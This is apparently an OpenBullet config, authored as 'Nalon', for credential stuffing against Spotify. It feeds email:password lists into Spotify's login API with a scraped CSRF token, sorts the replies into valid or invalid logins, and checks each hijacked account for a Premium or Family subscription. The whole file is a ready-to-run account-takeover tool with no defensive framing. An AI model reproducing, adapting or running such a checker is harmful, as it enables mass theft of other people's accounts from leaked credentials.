[SETTINGS]
{
  "Name": "Spotify ",
  "SuggestedBots": 200,
  "LastModified": "2019-07-10T23:10:20.5887405+01:00",
  "AdditionalInfo": "",
  "Author": "Nalon",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "accounts" 
  KEYCHAIN Retry OR 
    KEY "429" 
PARSE "<COOKIES(csrf_token)>" LR "" "" -> VAR "CSRF" 
REQUEST POST "https://accounts.spotify.com/api/login" 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"displayName\":\"" 
  KEYCHAIN Failure OR 
    KEY "{\"error\":\"errorInvalidCredentials\"}" 
REQUEST GET "https://www.spotify.com/uk/account/subscription/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Premium for Family" 
  KEYCHAIN Success OR 
    KEY "Spotify Premium" 
    KEY "Spotify Premium will end on" 
  KEYCHAIN Failure OR 
    KEY "Spotify Free" 
    KEY "You're currently Spotify Free" 
    KEY "You're a member of a family plan." 
